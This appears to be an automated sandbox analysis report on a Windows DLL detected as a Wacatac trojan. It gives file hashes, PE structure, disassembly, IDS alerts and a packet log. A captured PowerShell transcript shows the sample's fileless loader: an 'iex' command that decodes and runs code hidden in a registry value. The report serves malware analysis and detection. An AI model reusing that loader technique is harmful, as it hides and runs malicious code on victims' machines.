SSDEEP:	192:kBqoxKAuqR+FrJ4biMZ9caQlRFMZ9caQlR9YMZ9caQlRf:kBqoxKAuqR+FrJ4bijlRFjlR9YjlRf
MD5:	F1BBF4CDD59D9EC56E8B1C65E0985908
SHA1:	8745C826FFB28BED74E70CB20B4AA9FC42FB81CE
SHA-256:	E47DAAE985501E8D61DA6E45500A03F68BDD0DAC2E3B66E9F0F33DCEFE54B6CC
SHA-512:	9F151AE0CB84B841F57ABD10D46CFDF595CBDC5AAFD3634635C97E63953D9E4E3EFEF870F175B5BA4D005A4B1C0341EE13BDBD551671A753F2B0C8D9A5E131A9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC64A65F1771A7294.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40193
Entropy (8bit):	0.6733666051952991
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+LFX+FIyw3APILyw3APIIyw3APIl:kBqoxKAuqR+LFX+FIGP4GP/GPI
MD5:	B236051A995F237674C8AB08DCA6FDD5
SHA1:	1B186A268AAF949297403D25A8AB3EF3E7703789
SHA-256:	CDDBFC63406E1139ABBBC33F0566A1F20527ABCF0EC2E8DC7C8ADA4BED722E20
SHA-512:	D693710622D51BB18C28EB7968440A2A4BD522F22224E7A5234CF85C770B23A1070F959619A9009B89F8815A0719286E1239F1891713D213810512355E5E37DE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\20210210\PowerShell_transcript.035347.M4D9XJsp.20210210151557.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1197
Entropy (8bit):	5.300725908906392
Encrypted:	false
SSDEEP:	24:BxSA+dZOvBdaazx2DOXUWOLCHGIYBtLW5HjeTKKjX4CIym1ZJXAOLCHGIYBtfnx9:BZ1v6aoORF/5qDYB1Z+FeZZb
MD5:	008CA8AC4F159E5A7280A662FF0FDA97
SHA1:	898189E71E064D07CD17704793A20016C32ADCA1
SHA-256:	B498461ECE71305EB162295B9F4A8D82BBF3A639BE18D7AD65236621190AE38A
SHA-512:	6611E2537FB3D8410982D786685B674670BDFD9DAA95299927C3501D6BAB34977D2A59C40F0C366546186FB615B1F2C834D1BFF6D8D3978CA667E09EE48CAA5F
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210210151557..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 035347 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 7048..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210210151557..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.505516676528311
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
File size:	466944
MD5:	4e62d8a29ba5805407ece642d63df461
SHA1:	320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256:	ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
SHA512:	98909fb1403057de43205ddc9cb8d4ce5064bb3ae638f8ef09cdffffd3bf08fcaa8714c0f13ec893c9dabe1bdafdc83e82c84db3195693ed8e901f99b39e4684
SSDEEP:	12288:ZEZ6A+uMuXbMkoMouSkTqT7V9VqJ2Biw:ZWkuMuXb/LTqdq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8...9...8...9...8...9...8...9...8...9...8...9...8..J8...8...8...8...9...8...9...8..&8...8...9...8Rich...8.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10026320
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5660B6D4 [Thu Dec 3 21:40:36 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	281ea861025d7e9240efd01bc3d8f17a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F6048A1E2B7h
call 00007F6048A1EC57h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F6048A1E0C6h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx
push 00000001h
mov eax, dword ptr [ebp+08h]
push eax
mov ecx, dword ptr [ebp-04h]
call 00007F6048A1E3D0h
mov ecx, dword ptr [ebp-04h]
mov dword ptr [ecx], 1005EB84h
mov eax, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
retn 0004h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx
mov eax, dword ptr [ebp+08h]
push eax
mov ecx, dword ptr [ebp-04h]
call 00007F6048A1E362h
mov ecx, dword ptr [ebp-04h]
mov dword ptr [ecx], 1005EB84h
mov eax, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
retn 0004h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx
push 00000001h
push 1005EB8Ch
mov ecx, dword ptr [ebp-04h]
call 00007F6048A1E36Fh
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], 1005EB84h
mov eax, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-04h], ecx

Rich Headers

Programming Language:

[RES] VS2015 UPD3 build 24213
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x6e7e0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6e830	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x34c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x2eb4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6cdc0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x6ce74	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x6ce18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x56000	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x540ea	0x54200	False	0.547028812221	data	6.50211232576	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x56000	0x19030	0x19200	False	0.41747318097	data	5.50712561288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x70000	0x161cc	0x1000	False	0.205078125	data	3.58289260721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x87000	0x9	0x200	False	0.033203125	data	0.0203931352361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x88000	0xf8	0x200	False	0.26171875	data	1.29252519589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x34c	0x400	False	0.396484375	data	2.83417036073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x2eb4	0x3000	False	0.773518880208	data	6.66007908075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89058	0x2f4	data	English	United States

Imports

DLL

Import

KERNEL32.dll

GetProcAddress, VirtualProtect, HeapAlloc, HeapFree, HeapWalk, Sleep, GetLocalTime, GetTickCount, OpenMutexA, LoadLibraryA, GetModuleFileNameA, GetEnvironmentVariableA, GetWindowsDirectoryA, CreateFileA, CreateFileW, SetFilePointerEx, CloseHandle, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, GetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapValidate, GetSystemInfo, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, WriteFile, OutputDebugStringW, WriteConsoleW, HeapReAlloc, HeapSize, HeapQueryInformation, GetStringTypeW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetStdHandle, GetFileSizeEx, DecodePointer

ole32.dll

OleUninitialize, OleInitialize, OleSetContainedObject

Exports

Name	Ordinal	Address
Grewrace	1	0x1001d370
Put	2	0x1001d240

Version Infos

Description	Data
LegalCopyright	2014 Card sail Corporation. All rights reserved
InternalName	Go.dll
FileVersion	4.2.2.67
CompanyName	Card sail
URL	https://toldsend.com
ProductName	Card sail Wood why
FileDescription	Wood why
OriginalFilename	Go.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/10/21-15:15:45.007604	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.7	8.8.8.8
02/10/21-15:16:16.602836	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.7	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2021 15:15:40.531838894 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.532143116 CET	49756	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.606050968 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.606203079 CET	80	49756	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.606208086 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.606373072 CET	49756	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.607914925 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.723108053 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996198893 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996232986 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996254921 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996273041 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996289968 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996294022 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.996306896 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:40.996334076 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:40.996361017 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.035697937 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.035742044 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.035768032 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.035793066 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.035871029 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.035919905 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.070897102 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.070955992 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.070991039 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071019888 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071026087 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071059942 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071069002 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071083069 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071105957 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071140051 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071158886 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071176052 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071192980 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071208000 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.071223974 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.071259022 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.075469971 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.075516939 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.075649977 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.080199003 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.080323935 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.111747026 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111783028 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111808062 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111828089 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111850977 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111874104 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111895084 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111915112 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.111998081 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.112059116 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.146960974 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147000074 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147027969 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147044897 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147059917 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147074938 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147079945 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.147092104 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147109985 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147133112 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147146940 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.147155046 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147176981 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147196054 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147212982 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.147216082 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147233963 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.147252083 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.147278070 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.156470060 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156526089 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156563997 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156586885 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156604052 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156621933 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156636953 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156653881 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156671047 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.156676054 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156709909 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.156748056 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.156822920 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.186259031 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186295986 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186319113 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186342955 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186355114 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.186367989 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186398029 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186400890 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.186424017 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186448097 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.186449051 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186470985 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.186476946 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.186513901 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221667051 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221700907 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221724987 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221746922 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221771002 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221791029 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221806049 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221816063 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221839905 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221841097 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221867085 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221890926 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221890926 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221915960 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221918106 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221946001 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221955061 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.221967936 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.221976995 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.222002983 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.222031116 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.235940933 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.235976934 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.235999107 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236021996 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236043930 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236069918 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236094952 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236100912 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.236119032 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236143112 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236166954 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236182928 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.236193895 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236203909 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.236218929 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.236231089 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.236265898 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.238950014 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.238985062 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.239008904 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.239059925 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.239094973 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.239103079 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.239125967 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.239150047 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.240782022 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.240884066 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.260658979 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.260883093 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276140928 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276190042 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276215076 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276230097 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276241064 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276259899 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276267052 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276292086 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276297092 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276316881 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276341915 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276350975 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276364088 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276381969 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276406050 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276407003 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276432991 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276456118 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.276462078 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.276499033 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.278294086 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.278327942 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.278352976 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.278378010 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.278393984 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.278402090 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.278419018 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.278459072 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.280895948 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.280996084 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.296147108 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.296447039 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.316936970 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.316976070 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317001104 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317023993 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317042112 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317060947 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317080975 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317080975 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.317099094 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317126036 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317135096 CET	49755	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:41.317150116 CET	80	49755	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:41.317173004 CET	49755	80	192.168.2.7	35.228.31.40
